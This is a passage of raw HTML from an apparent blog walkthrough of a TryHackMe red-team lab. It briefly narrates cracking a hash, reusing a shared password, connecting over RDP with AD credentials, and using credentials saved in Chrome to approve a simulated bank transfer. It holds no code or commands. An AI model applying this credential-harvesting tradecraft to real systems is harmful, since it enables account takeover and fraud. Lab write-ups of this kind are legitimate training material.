\/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We tried cracking the hash offline and we were successful.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091224f9&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091224f9\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"878\" height=\"322\" data-attachment-id=\"538\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210215433\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210215433.png?fit=878%2C322&amp;ssl=1\" data-orig-size=\"878,322\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210215433\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210215433.png?fit=878%2C322&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210215433.png?resize=878%2C322&#038;ssl=1\" alt=\"\" class=\"wp-image-538\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210215433.png?w=878&amp;ssl=1 878w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210215433.png?resize=300%2C110&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210215433.png?resize=768%2C282&amp;ssl=1 768w\" sizes=\"auto, (max-width: 878px) 100vw, 878px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" 
fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>We noticed that the hash for the c.young and a.holt users was the same. Both users have the same password. This could be intentional, or other users working on the lab at the same time\u2013since this is a shared environment\u2013might have changed the passwords for the users. Changing the passwords for the users seems easy but it is not recommended.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can log in as <code>c.young<\/code> and forward our transaction.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09122c3a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09122c3a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"527\" data-attachment-id=\"539\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210220333\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?fit=1529%2C787&amp;ssl=1\" data-orig-size=\"1529,787\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210220333\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?fit=1024%2C527&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?resize=1024%2C527&#038;ssl=1\" alt=\"\" class=\"wp-image-539\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?resize=1024%2C527&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?resize=300%2C154&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?resize=768%2C395&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?w=1529&amp;ssl=1 1529w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09123436&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09123436\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"530\" data-attachment-id=\"540\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210220428\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?fit=1515%2C784&amp;ssl=1\" data-orig-size=\"1515,784\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210220428\" data-image-description=\"\" 
data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?fit=1024%2C530&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?resize=1024%2C530&#038;ssl=1\" alt=\"\" class=\"wp-image-540\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?resize=1024%2C530&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?resize=300%2C155&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?resize=768%2C397&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?w=1515&amp;ssl=1 1515w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div 
style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09123be8&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09123be8\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"486\" data-attachment-id=\"541\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210220502\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?fit=1516%2C719&amp;ssl=1\" data-orig-size=\"1516,719\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210220502\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?fit=1024%2C486&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?resize=1024%2C486&#038;ssl=1\" alt=\"\" class=\"wp-image-541\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?resize=1024%2C486&amp;ssl=1 
1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?resize=300%2C142&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?resize=768%2C364&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?w=1516&amp;ssl=1 1516w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<p>Next, we need to log in as the <code>a.holt<\/code> user and approve the transaction. But for some reason, the credentials won&#8217;t work. We will connect to the JMP machine via RDP and use a.holt&#8217;s AD credentials. 
After logging in we can see there is a note that clarifies why AD credentials did not work for a.holt on the bank login page.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091243d8&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091243d8\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"526\" data-attachment-id=\"543\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210220802\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?fit=1505%2C773&amp;ssl=1\" data-orig-size=\"1505,773\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210220802\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?fit=1024%2C526&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?resize=1024%2C526&#038;ssl=1\" alt=\"\" 
class=\"wp-image-543\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?resize=1024%2C526&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?resize=300%2C154&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?resize=768%2C394&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?w=1505&amp;ssl=1 1505w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>The approvers&#8217; account credentials are not the same as their AD account credentials.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Upon further enumeration, we notice that when trying to log in to the bank application using Google Chrome, the username and password fields get auto-filled! On checking the Settings in the browser, we see that credentials are saved for the site! 
We can log in now and approve the transaction.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09124ab0&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09124ab0\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"521\" data-attachment-id=\"544\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210222841\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?fit=1536%2C782&amp;ssl=1\" data-orig-size=\"1536,782\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210222841\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?fit=1024%2C521&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?resize=1024%2C521&#038;ssl=1\" alt=\"\" class=\"wp-image-544\" 
srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?resize=1024%2C521&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?resize=300%2C153&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?resize=768%2C391&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?w=1536&amp;ssl=1 1536w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091250fb&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091250fb\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"524\" data-attachment-id=\"545\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210223147\/\" 
data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?fit=1510%2C773&amp;ssl=1\" data-orig-size=\"1510,773\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210223147\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?fit=1024%2C524&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?resize=1024%2C524&#038;ssl=1\" alt=\"\" class=\"wp-image-545\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?resize=1024%2C524&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?resize=300%2C154&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?resize=768%2C393&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?w=1510&amp;ssl=1 1510w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
